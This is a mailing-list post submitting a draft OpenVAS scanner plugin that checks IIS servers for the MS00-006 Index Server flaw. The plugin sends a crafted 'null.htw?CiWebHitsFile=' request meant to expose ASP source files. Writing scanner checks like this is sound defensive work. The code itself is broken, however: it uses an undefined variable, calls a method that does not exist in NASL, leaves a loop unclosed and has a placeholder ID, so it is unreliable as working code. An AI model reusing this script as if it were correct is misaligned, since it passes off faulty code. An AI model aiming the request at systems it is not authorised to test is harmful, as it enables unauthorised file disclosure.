Hi all here is the NVT for MS00-06, shortly I'll send the Filemaker, MDNS and
EMC Legato information gathering modules. Note that the script_id is missing.
# OpenVAS Vulnerability Test
# $Id$
# Description:
# This program test for the following vulnerabilities:
# Microsoft Index Server File Information and Path Disclosure Vulnerability
(MS00-006)
# Microsoft Index Server 'Malformed Hit-Highlighting' Directory Traversal
Vulnerability (MS00-006)
# Microsoft IIS 'idq.dll' Directory Traversal Vulnerability (MS00-006)
# Microsoft Index Server ASP Source Code Disclosure Vulnerability (MS00-006)
#
# Author:
# Christian Eric Edjenguele <[EMAIL PROTECTED]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 and later,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
if(description)
{
script_id(00000);
script_bugtraq_id(950);
script_xref(name: "Microsoft", value: "MS00-006");
script_cve_id("CVE-2000-0097");
name["english"] = "Malformed Hit-Highlighting Argument Vulnerability ";
script_name(english:name["english"]);
desc["english"] = "
The WebHits ISAPI filter in Microsoft Index Server allows remote attackers to
read arbitrary files,
aka the "Malformed Hit-Highlighting Argument" vulnerability.
Solution :
To Fix that, you must download the latest upodates from microsoft security
website:
http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp.
Risk factor : Medium";
script_description(english:desc["english"]);
summary["english"] = "A vulnerability on Microsoft index server allows
unauthorized predictable file location";
script_summary(english:summary["english"]);
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is under GPL v2 +");
family["english"] = "General";
script_family(english:family["english"]);
script_dependencie("find_service.nes");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("http_func.inc");
port = get_http_port(default:80);
# Asp files the plugin will test
pages = make_array( 1, 'default.asp', 2, 'iisstart.asp', 3, 'localstart.asp')
# open http connection to the remote host
soc = http_open_soc(port);
if (!soc) return(1);
# Build the malicious request
foreach asp_files (pages)
{
req = http_get( item:string( '\/null.htw?CiWebHitsFile=\/' + asp_file +
'%20&CiRestriction=none&CiHiliteType=Full'));
send(socket:soc, data: req);
# Get back the response
reply_code = recv_line(socket:soc, length:1204);
if(reply_code)
{
reply_header = recv_headers2(socket:soc);
reply_headers = strcat(reply_code, reply_header);
reply_body = http_recv_body(socket:soc, headers: reply_headers);
reply_bodylowerized = reply_body.lower();
}
# clode http connection
http_close_socket(soc);
# check the reply for vulnerability
if('Microsoft-IIS' >< reply_headers && reply_code == 200 && string('<html>') ><
reply_bodylowerized)
security_hole(port);
===
Christian Eric Edjenguele
IT Security Software Developer & Researcher
tel. +39 3408580513
View my linkedin profile: http://www.linkedin.com/in/edjenguele
My blog: http://www.edjenguele.blogspot.com
---
Management, Developers, Security Professionals – can only result in one thing……
better security.
http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference Sept 22nd-25th
2008
__________________________________________________
Do You Yahoo!?
Poco spazio e tanto spam? Yahoo! Mail ti protegge dallo spam e ti da tanto
spazio gratuito per i tuoi file e i messaggi
http://mail.yahoo.it
_______________________________________________
Openvas-plugins mailing list
[email protected]
http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins
